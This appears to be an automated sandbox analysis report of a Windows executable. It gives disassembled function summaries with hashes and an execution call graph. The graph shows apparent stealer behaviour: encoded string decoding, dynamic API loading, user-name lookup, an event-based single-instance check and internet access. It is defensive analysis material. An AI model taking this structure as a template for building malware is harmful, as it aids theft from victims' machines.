                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                            • String ID:
                                                                            • API String ID: 1088826258-0
                                                                            • Opcode ID: e28788b97105c0b29641fe4b95bea9195b6d20fa50fdd98d49d5e83304d5ac9a
                                                                            • Instruction ID: af2300052cb91436d5bfeccb9ad657f218c3794c999db24999d1a6a767d899e7
                                                                            • Opcode Fuzzy Hash: e28788b97105c0b29641fe4b95bea9195b6d20fa50fdd98d49d5e83304d5ac9a
                                                                            • Instruction Fuzzy Hash: 4201F275A002209BDB06EF20D851A3D7B75FFA4750F48001AE82167791CF34AF82CBCA
                                                                            Function 001325A5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 001325AC
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001325B9
                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001325F6
                                                                              • Part of subcall function 00133F10: _Yarn.LIBCPMT ref: 00133F2F
                                                                              • Part of subcall function 00133F10: _Yarn.LIBCPMT ref: 00133F53
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                                                            • String ID: bad locale name
                                                                            • API String ID: 482894088-1405518554
                                                                            • Opcode ID: 1d9830b1bf72eff7c57581e473882098fd2e4abfe584ec9156c10f48962da1fc
                                                                            • Instruction ID: 38f8b540222ad2bf544c68ea7dbbaec30aebb115dba0bf0330b66d8c52eb2436
                                                                            • Opcode Fuzzy Hash: 1d9830b1bf72eff7c57581e473882098fd2e4abfe584ec9156c10f48962da1fc
                                                                            • Instruction Fuzzy Hash: 4F018CB19057549FCB20AF6A988154BFEE0BF38310B40896FE58D97A01C770A644CBAA
                                                                            Function 00138BF2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00155048,00000000,00000800,?,00138BA3,00000000,?,00000000,?,?,?,00138CCD,00000002,FlsGetValue,0014EC80,FlsGetValue), ref: 00138BFF
                                                                            • GetLastError.KERNEL32(?,00138BA3,00000000,?,00000000,?,?,?,00138CCD,00000002,FlsGetValue,0014EC80,FlsGetValue,00000000,?,00137B5D), ref: 00138C09
                                                                            • LoadLibraryExW.KERNEL32(00155048,00000000,00000000,?,00155048,?,?,?,001318ED,?,001318ED,?), ref: 00138C31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID: api-ms-
                                                                            • API String ID: 3177248105-2084034818
                                                                            • Opcode ID: 70e5038fe392f5cee09affef2300383cc8fed24358716184bd8dc5e7dfbe02d2
                                                                            • Instruction ID: dc9358bd07d4a811e0fce40e3dcf7c55ba5ef79f34c527c2f28e765c7da2127d
                                                                            • Opcode Fuzzy Hash: 70e5038fe392f5cee09affef2300383cc8fed24358716184bd8dc5e7dfbe02d2
                                                                            • Instruction Fuzzy Hash: 19E04834240308BBEF202F60ED06B593E559F11B80F100020FA0CE94F1DBA6D9529695
                                                                            Function 0013FDCE Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetConsoleOutputCP.KERNEL32(C118BA38,00000000,00000000,00000000), ref: 0013FE31
                                                                              • Part of subcall function 00143E34: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00142DC6,?,00000000,-00000008), ref: 00143EE0
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0014008C
                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001400D4
                                                                            • GetLastError.KERNEL32 ref: 00140177
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                            • String ID:
                                                                            • API String ID: 2112829910-0
                                                                            • Opcode ID: 4eb73900f421d97f0c662959863cdd793d2428f57f66ee1201bd040f2c40e2f7
                                                                            • Instruction ID: b8b50fa261d151f8fb778f52d527de0610c923b02aa3b061ac683dc26e170b3a
                                                                            • Opcode Fuzzy Hash: 4eb73900f421d97f0c662959863cdd793d2428f57f66ee1201bd040f2c40e2f7
                                                                            • Instruction Fuzzy Hash: BFD159B5E002589FCF16CFA9D880AEEBBB5FF09314F18452AE955E7361D730A942CB50
                                                                            Function 00137BC1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AdjustPointer
                                                                            • String ID:
                                                                            • API String ID: 1740715915-0
                                                                            • Opcode ID: 420ed7b324eba887a4feb1242fb5c49529c623feebea0c8afa067dc8a44a60cc
                                                                            • Instruction ID: 1389a550a29f5233a5cbb3f93418633376fb43acaaea82d050553bd8304f2c74
                                                                            • Opcode Fuzzy Hash: 420ed7b324eba887a4feb1242fb5c49529c623feebea0c8afa067dc8a44a60cc
                                                                            • Instruction Fuzzy Hash: 8551CAB2608A07AFDB398F54D841BBAB3A5EF14710F244529E846866D1E731A884CB90
                                                                            Function 00144250 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00143E34: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00142DC6,?,00000000,-00000008), ref: 00143EE0
                                                                            • GetLastError.KERNEL32 ref: 001442B4
                                                                            • __dosmaperr.LIBCMT ref: 001442BB
                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 001442F5
                                                                            • __dosmaperr.LIBCMT ref: 001442FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1913693674-0
                                                                            • Opcode ID: 02855915173d5f202ad8df9b4dc9cede641941f4754c62c9417dab3e1657db2c
                                                                            • Instruction ID: b054eaafa397aabb0c4338fc66aecbb5a66b2950d7e142970cfb35bfafc76ef5
                                                                            • Opcode Fuzzy Hash: 02855915173d5f202ad8df9b4dc9cede641941f4754c62c9417dab3e1657db2c
                                                                            • Instruction Fuzzy Hash: 3521D171604215AFDF20EFA5DC81E6FB7A9FF55364B108518FA29D7221E770EC418B90
                                                                            Function 0013B5A9 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cc8a0dc69324ec792e81e5e9fcb70cf77ff8dd8824db4c01e9e905696c97d7f9
                                                                            • Instruction ID: 40b870b89e47982ad46bf422f6c197c7f9a29b092da495cca0776cc6889a5950
                                                                            • Opcode Fuzzy Hash: cc8a0dc69324ec792e81e5e9fcb70cf77ff8dd8824db4c01e9e905696c97d7f9
                                                                            • Instruction Fuzzy Hash: 22218EB1608205AFDB20AF619CC2D6AB7A9EF61364F114525FB15D7162FB31EC408BA0
                                                                            Function 001451E6 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 001451EE
                                                                              • Part of subcall function 00143E34: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00142DC6,?,00000000,-00000008), ref: 00143EE0
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00145226
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00145246
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 158306478-0
                                                                            • Opcode ID: 34989a029cb5aae39733983d34670a9629212e63a7cf5a4c80fe3a3382817fe2
                                                                            • Instruction ID: f97c901a55b89823b636d65a35c8dcb577a9152df8cb4d66981460e24fa9a31a
                                                                            • Opcode Fuzzy Hash: 34989a029cb5aae39733983d34670a9629212e63a7cf5a4c80fe3a3382817fe2
                                                                            • Instruction Fuzzy Hash: 161126F1501A19BFAB1127B16C89CBF69DDDFA97947100125F801E1162EBA1CE404570
                                                                            Function 00149615 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00148411,00000000,00000001,00000000,00000000,?,001401CB,00000000,00000000,00000000), ref: 0014962C
                                                                            • GetLastError.KERNEL32(?,00148411,00000000,00000001,00000000,00000000,?,001401CB,00000000,00000000,00000000,00000000,00000000,?,00140752,00000000), ref: 00149638
                                                                              • Part of subcall function 001495FE: CloseHandle.KERNEL32(FFFFFFFE,00149648,?,00148411,00000000,00000001,00000000,00000000,?,001401CB,00000000,00000000,00000000,00000000,00000000), ref: 0014960E
                                                                            • ___initconout.LIBCMT ref: 00149648
                                                                              • Part of subcall function 001495C0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001495EF,001483FE,00000000,?,001401CB,00000000,00000000,00000000,00000000), ref: 001495D3
                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00148411,00000000,00000001,00000000,00000000,?,001401CB,00000000,00000000,00000000,00000000), ref: 0014965D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                            • String ID:
                                                                            • API String ID: 2744216297-0
                                                                            • Opcode ID: c4ff1aecb24366a96f73d3ccd511f021ac174a23e565abd96434071470575ff1
                                                                            • Instruction ID: 3cb24c4747d8bac82ad3aa86a6a8dc527203c6568ca2324de5df587c657e9fe2
                                                                            • Opcode Fuzzy Hash: c4ff1aecb24366a96f73d3ccd511f021ac174a23e565abd96434071470575ff1
                                                                            • Instruction Fuzzy Hash: 4DF0AC36501158BBCF221FA5EC0999E3F2AEF197A1F154015FA19D6530DB3289A0DB90
                                                                            Function 001381BD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 001381E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EncodePointer
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 2118026453-2084237596
                                                                            • Opcode ID: f0b4ab5cc03a5e88684ecf61dcfd24bcb557a39488254e25ddeba975346b7b7a
                                                                            • Instruction ID: 087695427885c986845c6524cc0408ed938e3202b17ad6463648c76ad0bd695c
                                                                            • Opcode Fuzzy Hash: f0b4ab5cc03a5e88684ecf61dcfd24bcb557a39488254e25ddeba975346b7b7a
                                                                            • Instruction Fuzzy Hash: B3416771900609EFDF15DF98CD81AEEBBB5FF49300F188159F908A7261D735AA50DB50

                                                                            Execution Graph

                                                                            Execution Coverage:4.5%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:11.9%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:39
                                                                            execution_graph 77515 417250 77539 40254e 77515->77539 77523 417274 77637 40fa9c _EH_prolog lstrlenA 77523->77637 77526 40fa9c 4 API calls 77527 41729b 77526->77527 77528 40fa9c 4 API calls 77527->77528 77529 4172a2 77528->77529 77641 40f9e1 77529->77641 77531 4172ab 77532 4172ee OpenEventA 77531->77532 77533 4172d4 CloseHandle Sleep 77532->77533 77534 4172fb 77532->77534 77835 40fb4d 77533->77835 77536 417303 CreateEventA 77534->77536 77645 41695f _EH_prolog 77536->77645 77836 4024d7 memset 77539->77836 77541 402562 77542 4024d7 9 API calls 77541->77542 77543 402573 77542->77543 77544 4024d7 9 API calls 77543->77544 77545 402584 77544->77545 77546 4024d7 9 API calls 77545->77546 77547 402595 77546->77547 77548 4024d7 9 API calls 77547->77548 77549 4025a6 77548->77549 77550 4024d7 9 API calls 77549->77550 77551 4025b7 77550->77551 77552 4024d7 9 API calls 77551->77552 77553 4025c8 77552->77553 77554 4024d7 9 API calls 77553->77554 77555 4025d9 77554->77555 77556 4024d7 9 API calls 77555->77556 77557 4025ea 77556->77557 77558 4024d7 9 API calls 77557->77558 77559 4025fb 77558->77559 77560 4024d7 9 API calls 77559->77560 77561 40260c 77560->77561 77562 4024d7 9 API calls 77561->77562 77563 40261d 77562->77563 77564 4024d7 9 API calls 77563->77564 77565 40262e 77564->77565 77566 4024d7 9 API calls 77565->77566 77567 40263f 77566->77567 77568 4024d7 9 API calls 77567->77568 77569 402650 77568->77569 77570 4024d7 9 API calls 77569->77570 77571 402661 77570->77571 77572 4024d7 9 API calls 77571->77572 77573 402672 77572->77573 77574 4024d7 9 API calls 77573->77574 77575 402683 77574->77575 77576 4024d7 9 API calls 77575->77576 77577 402694 77576->77577 77578 4024d7 9 API calls 77577->77578 77579 4026a5 77578->77579 77580 4024d7 9 API calls 77579->77580 77581 4026b6 77580->77581 77582 4024d7 9 API calls 77581->77582 77583 4026c7 77582->77583 77584 4024d7 9 API calls 77583->77584 77585 4026d8 77584->77585 77586 4024d7 9 API calls 77585->77586 77587 4026e9 77586->77587 77588 4024d7 9 API calls 77587->77588 77589 4026fa 77588->77589 77590 4024d7 9 API calls 77589->77590 77591 40270b 77590->77591 77592 4024d7 9 API calls 77591->77592 77593 40271c 77592->77593 77594 4024d7 9 API calls 77593->77594 77595 40272d 77594->77595 77596 4024d7 9 API calls 77595->77596 77597 40273e 77596->77597 77598 4024d7 9 API calls 77597->77598 77599 40274f 77598->77599 77600 4024d7 9 API calls 77599->77600 77601 402760 77600->77601 77602 4024d7 9 API calls 77601->77602 77603 402771 77602->77603 77604 4024d7 9 API calls 77603->77604 77605 402782 77604->77605 77606 4024d7 9 API calls 77605->77606 77607 402793 77606->77607 77608 4024d7 9 API calls 77607->77608 77609 4027a4 77608->77609 77610 4024d7 9 API calls 77609->77610 77611 4027b5 77610->77611 77612 4024d7 9 API calls 77611->77612 77613 4027c6 77612->77613 77614 4024d7 9 API calls 77613->77614 77615 4027d7 77614->77615 77616 4024d7 9 API calls 77615->77616 77617 4027e8 77616->77617 77618 417330 LoadLibraryA 77617->77618 77619 417348 77618->77619 77620 41753a LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 77618->77620 77627 417369 20 API calls 77619->77627 77621 417598 GetProcAddress 77620->77621 77622 4175aa 77620->77622 77621->77622 77623 4175b3 GetProcAddress GetProcAddress 77622->77623 77624 4175dc 77622->77624 77623->77624 77625 4175e5 GetProcAddress 77624->77625 77626 4175f7 77624->77626 77625->77626 77628 417600 GetProcAddress 77626->77628 77629 417612 77626->77629 77627->77620 77628->77629 77630 417262 77629->77630 77631 41761b GetProcAddress GetProcAddress 77629->77631 77632 40f923 77630->77632 77631->77630 77634 40f931 77632->77634 77633 40f953 77636 40fbcb GetProcessHeap HeapAlloc GetUserNameA 77633->77636 77634->77633 77635 40f949 lstrcpy 77634->77635 77635->77633 77636->77523 77638 40fadc 77637->77638 77639 40fb01 77638->77639 77640 40faee lstrcpy lstrcat 77638->77640 77639->77526 77640->77639 77642 40f9f7 77641->77642 77643 40fa20 77642->77643 77644 40fa18 lstrcpy 77642->77644 77643->77531 77644->77643 77646 416973 77645->77646 77647 40f923 lstrcpy 77646->77647 77648 416986 77647->77648 77857 4134fd _EH_prolog 77648->77857 77650 416996 77859 4135ac _EH_prolog 77650->77859 77652 4169a5 77861 40f997 lstrlenA 77652->77861 77655 40f997 2 API calls 77656 4169c9 77655->77656 77865 4027ef 77656->77865 77662 416aba 77663 40f9e1 lstrcpy 77662->77663 77664 416acc 77663->77664 77665 40f923 lstrcpy 77664->77665 77666 416aeb 77665->77666 77667 40fa9c 4 API calls 77666->77667 77668 416b04 77667->77668 78455 40fa28 _EH_prolog 77668->78455 77671 40f9e1 lstrcpy 77672 416b2d 77671->77672 77673 416b54 CreateDirectoryA 77672->77673 78459 4010b1 _EH_prolog 77673->78459 77681 416b9d 77682 40f9e1 lstrcpy 77681->77682 77683 416baf 77682->77683 77684 40f9e1 lstrcpy 77683->77684 77685 416bc1 77684->77685 78582 40f95a 77685->78582 77688 40fa9c 4 API calls 77689 416be5 77688->77689 77690 40f9e1 lstrcpy 77689->77690 77691 416bf2 77690->77691 77692 40fa28 3 API calls 77691->77692 77693 416c11 77692->77693 77694 40f9e1 lstrcpy 77693->77694 77695 416c1e 77694->77695 77696 416c39 InternetOpenA 77695->77696 78586 40fb4d 77696->78586 77698 416c55 InternetOpenA 77699 40f95a lstrcpy 77698->77699 77700 416c85 77699->77700 77701 40f923 lstrcpy 77700->77701 77702 416c9c 77701->77702 78587 4104dd _EH_prolog GetWindowsDirectoryA 77702->78587 77705 40f95a lstrcpy 77706 416cc5 77705->77706 78606 403af5 _EH_prolog 77706->78606 77708 416ccf 78742 411cd8 _EH_prolog 77708->78742 77710 416cd7 77711 40f923 lstrcpy 77710->77711 77712 416d0b 77711->77712 77713 4010b1 2 API calls 77712->77713 77714 416d23 77713->77714 78762 40514c _EH_prolog 77714->78762 77716 416d2d 78941 411715 _EH_prolog 77716->78941 77718 416d35 77719 40f923 lstrcpy 77718->77719 77720 416d5d 77719->77720 77721 4010b1 2 API calls 77720->77721 77722 416d75 77721->77722 77723 40514c 46 API calls 77722->77723 77724 416d7f 77723->77724 78949 4114ee _EH_prolog 77724->78949 77726 416d87 77727 40f923 lstrcpy 77726->77727 77728 416daf 77727->77728 77729 4010b1 2 API calls 77728->77729 77730 416dc7 77729->77730 77731 40514c 46 API calls 77730->77731 77732 416dd1 77731->77732 78960 411649 _EH_prolog 77732->78960 77734 416dd9 77735 4010b1 2 API calls 77734->77735 77736 416ded 77735->77736 78969 414604 _EH_prolog 77736->78969 77739 40f95a lstrcpy 77740 416e06 77739->77740 77741 40f923 lstrcpy 77740->77741 77742 416e20 77741->77742 79311 4041b2 _EH_prolog 77742->79311 77744 416e29 77745 4010b1 2 API calls 77744->77745 77746 416e61 77745->77746 79330 40ed08 _EH_prolog 77746->79330 77835->77532 77841 40245c 77836->77841 77840 402536 memset 77840->77541 77853 4181c0 77841->77853 77846 410b12 77847 4024be CryptStringToBinaryA 77846->77847 77848 4024d0 strcat GetProcessHeap RtlAllocateHeap 77847->77848 77849 402308 77848->77849 77850 40231b 77849->77850 77851 40238b ??_U@YAPAXI 77850->77851 77852 4023a6 77851->77852 77852->77840 77854 402469 memset 77853->77854 77855 410b12 77854->77855 77856 40249e CryptStringToBinaryA 77855->77856 77856->77846 77858 413513 77857->77858 77858->77650 77860 4135c2 77859->77860 77860->77652 77862 40f9af 77861->77862 77863 40f9da 77862->77863 77864 40f9d0 lstrcpy 77862->77864 77863->77655 77864->77863 77866 4024d7 9 API calls 77865->77866 77867 4027f9 77866->77867 77868 4024d7 9 API calls 77867->77868 77869 40280a 77868->77869 77870 4024d7 9 API calls 77869->77870 77871 40281b 77870->77871 77872 4024d7 9 API calls 77871->77872 77873 40282c 77872->77873 77874 4024d7 9 API calls 77873->77874 77875 40283d 77874->77875 77876 4024d7 9 API calls 77875->77876 77877 40284e 77876->77877 77878 4024d7 9 API calls 77877->77878 77879 40285f 77878->77879 77880 4024d7 9 API calls 77879->77880 77881 402870 77880->77881 77882 4024d7 9 API calls 77881->77882 77883 402881 77882->77883 77884 4024d7 9 API calls 77883->77884 77885 402892 77884->77885 77886 4024d7 9 API calls 77885->77886 77887 4028a3 77886->77887 77888 4024d7 9 API calls 77887->77888 77889 4028b4 77888->77889 77890 4024d7 9 API calls 77889->77890 77891 4028c5 77890->77891 77892 4024d7 9 API calls 77891->77892 77893 4028d6 77892->77893 77894 4024d7 9 API calls 77893->77894 77895 4028e7 77894->77895 77896 4024d7 9 API calls 77895->77896 77897 4028f8 77896->77897 77898 4024d7 9 API calls 77897->77898 77899 402909 77898->77899 77900 4024d7 9 API calls 77899->77900 77901 40291a 77900->77901 77902 4024d7 9 API calls 77901->77902 77903 40292b 77902->77903 77904 4024d7 9 API calls 77903->77904 77905 40293c 77904->77905 77906 4024d7 9 API calls 77905->77906 77907 40294d 77906->77907 77908 4024d7 9 API calls 77907->77908 77909 40295e 77908->77909 77910 4024d7 9 API calls 77909->77910 77911 40296f 77910->77911 77912 4024d7 9 API calls 77911->77912 77913 402980 77912->77913 77914 4024d7 9 API calls 77913->77914 77915 402991 77914->77915 77916 4024d7 9 API calls 77915->77916 77917 4029a2 77916->77917 77918 4024d7 9 API calls 77917->77918 77919 4029b3 77918->77919 77920 4024d7 9 API calls 77919->77920 77921 4029c4 77920->77921 77922 4024d7 9 API calls 77921->77922 77923 4029d5 77922->77923 77924 4024d7 9 API calls 77923->77924 77925 4029e6 77924->77925 77926 4024d7 9 API calls 77925->77926 77927 4029f7 77926->77927 77928 4024d7 9 API calls 77927->77928 77929 402a08 77928->77929 77930 4024d7 9 API calls 77929->77930 77931 402a19 77930->77931 77932 4024d7 9 API calls 77931->77932 77933 402a2a 77932->77933 77934 4024d7 9 API calls 77933->77934 77935 402a3b 77934->77935 77936 4024d7 9 API calls 77935->77936 77937 